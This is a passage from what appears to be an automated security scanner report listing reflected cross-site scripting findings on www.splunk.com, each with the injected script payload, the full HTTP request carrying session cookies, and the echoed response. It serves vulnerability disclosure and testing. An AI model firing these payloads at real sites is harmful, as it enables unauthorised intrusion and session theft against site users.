<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... geVersion( ) { var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base22f49'-alert(1)-'27f5c74605b/Documentation/4.1.6/ReleaseNotes/4.1.6'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base22f49'-alert(1)-'27f5c74605b/ ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b23e5"><script>alert(1)</script>b80d5d28cc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentationb23e5"><script>alert(1)</script>b80d5d28cc8/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentationb23e5"><script>alert(1)</script>b80d5d28cc8/4.1.6/ReleaseNotes/4.1.6"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30c2e'-alert(1)-'485dbeda54d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation30c2e'-alert(1)-'485dbeda54d/4.1.6/ReleaseNotes/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]...
var versionIndex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation30c2e'-alert(1)-'485dbeda54d/4.1.6/ReleaseNotes/4.1.6'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation30c2e'-alert(1)-'485dbeda54d/ ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85f96"><script>alert(1)</script>f1da85a8e18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation/4.1.6/ReleaseNotes85f96"><script>alert(1)</script>f1da85a8e18/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes85f96"><script>alert(1)</script>f1da85a8e18/4.1.6"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b124b'-alert(1)-'794bc2e4b1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation/4.1.6/ReleaseNotesb124b'-alert(1)-'794bc2e4b1f/4.1.6 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... ex = document.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation/4.1.6/ReleaseNotesb124b'-alert(1)-'794bc2e4b1f/4.1.6'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation/4.1.6/ReleaseNotesb124b'-alert(1)-'794bc2e4b1f/ ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4903'-alert(1)-'c75c866ef81 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.6c4903'-alert(1)-'c75c866ef81 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... ocument.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation/4.1.6/ReleaseNotes/4.1.6c4903'-alert(1)-'c75c866ef81'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation/4.1.6/ReleaseNotes/4.1.6c4903'-alert(1)-'c75c866ef81" ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7155c"><script>alert(1)</script>509478c60a1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.67155c"><script>alert(1)</script>509478c60a1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.67155c"><script>alert(1)</script>509478c60a1"> ...[SNIP]...
4.385. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /base/Documentation/4.1.6/ReleaseNotes/4.1.6
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb1fc"><script>alert(1)</script>4c5aeb902fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.6?cb1fc"><script>alert(1)</script>4c5aeb902fb=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... <a href="http://www.splunk.com/index.php?module=roles&func=showloginform&redirecturl=http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6?cb1fc"><script>alert(1)</script>4c5aeb902fb=1"> ...[SNIP]...
4.386. http://www.splunk.com/base/Documentation/4.1.6/ReleaseNotes/4.1.6 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /base/Documentation/4.1.6/ReleaseNotes/4.1.6
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2080b'-alert(1)-'fc4b5596287 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /base/Documentation/4.1.6/ReleaseNotes/4.1.6?2080b'-alert(1)-'fc4b5596287=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
<!--Force IE6 into quirks mode with this comment tag--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://ww ...[SNIP]... cument.getElementById('docsVersionSelect').selectedIndex; var version = document.getElementById('docsVersionSelect')[versionIndex].value; var title = 'base/Documentation/4.1.6/ReleaseNotes/4.1.6?2080b'-alert(1)-'fc4b5596287=1'; sajax_do_call( 'efSplunkAjaxChangeVersion', [version,title], AjaxChangeVersion_callback ); //window.location.href = "/base/Documentation/4.1.6/ReleaseNotes/4.1.6?2080b'-alert(1)-'fc4b55962 ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7c511--><script>alert(1)</script>73db74c99c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cave7c511--><script>alert(1)</script>73db74c99c9/narc.php?u=/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&r=http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg&a=Adwords_Unix&cid= HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567; Enabled=true
The value of REST URL parameter 2 is copied into an HTML comment. The payload bfe11--><script>alert(1)</script>c54ef0afa5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cave/narc.phpbfe11--><script>alert(1)</script>c54ef0afa5d?u=/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw&r=http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg&a=Adwords_Unix&cid= HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567; Enabled=true
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4885f--><script>alert(1)</script>a3f95461609 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /company4885f--><script>alert(1)</script>a3f95461609 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.390. http://www.splunk.com/company [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /company
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4ebc4--><script>alert(1)</script>454624173e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /company?4ebc4--><script>alert(1)</script>454624173e1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:31 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27416
